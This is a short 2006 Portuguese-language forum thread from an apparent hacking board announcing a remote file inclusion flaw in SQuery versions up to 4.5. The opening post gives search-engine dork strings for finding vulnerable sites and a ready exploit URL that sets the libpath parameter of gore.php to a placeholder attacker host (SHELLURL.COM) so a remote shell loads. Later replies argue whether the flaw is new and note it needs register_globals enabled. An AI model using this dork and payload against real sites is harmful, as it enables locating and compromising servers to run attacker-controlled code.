SQuery <= 4.5(libpath) Remote File Inclusion

Started by Anonymous, 11 de July , 2006, 04:16:52 AM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Anonymous

Trabalhado : Todas versões                         
                                                             
Level Crítico : Perigoso                             
                                                               
Bug encontrado em  : gore.php                                   

=================================================================

Encontra-se :  "SQuery 4.5" |"SQuery 4.0" |"SQuery 3.9" |

inurl:"modules.php?name=SQuery"

http://sitename.com/SQuery/lib/gore.php?libpath=http://SHELLURL.COM?

Autor:SHiKaA

Wuefez

po cara ja tem uns 3 meses que saiu isso ai
e como não são muitos sites que usam o SQuery não da pra catar mais nada não...


"Quem fala não faz."

HadeS

Wuefez, pelo que eu saiba essa falha é nova.

Acho que uns dois dias atrás.

HadeS

slul

sim a falha eh nova mas soh pega servidores que tem o register_globals habilitado 1 em 100.000 :)


e como nao tem 100.000 sites q usem o SQuey

logo:

A falha nao eh utilizavel